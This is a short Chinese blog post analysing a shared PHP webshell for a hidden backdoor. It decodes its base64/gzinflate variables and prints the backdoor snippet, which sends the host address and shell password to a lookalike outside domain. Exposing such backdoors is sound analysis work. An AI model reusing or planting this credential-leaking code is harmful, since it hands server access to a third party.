一次对php大马的后门的简单分析

一次对php大马的后门的简单分析

有人分享了一个php大马(说是过waf)，八成有后门，简单分析了一次

一共有三个变量，$url、$get、$un，首先对着几个变量ascii转成字符串，看看是什么，用echo输出即可。

就是个简单的基于base64加gzinflate加密

还原一下:

现在马子的路数很清楚了 通过远程下载主力代码

到这儿我们还是没发现后门，通过wget下载v1QR1M.gif改后缀txt乱码（gzinflate压缩编码本该乱码）

 

后门部分：

if(isset($_GET['login'])=='geturl'){

    @set_time_limit(10);

    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = envlpass;

    $copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');

    $url=$copyurl.$serveru.'&pass='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

function geturl(){

    @set_time_limit(10);

    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = envlpass;

    $copyurl = base64_decode('');

    $url=$copyurl.$serveru.'&p='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

在1416行
SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=通过解码得出后门地址HTTP://WWW.FACEB0OK.CC/error.php?name=

 

posted @ 2019-05-22 17:42 卿先生 阅读(...) 评论(...) 编辑 收藏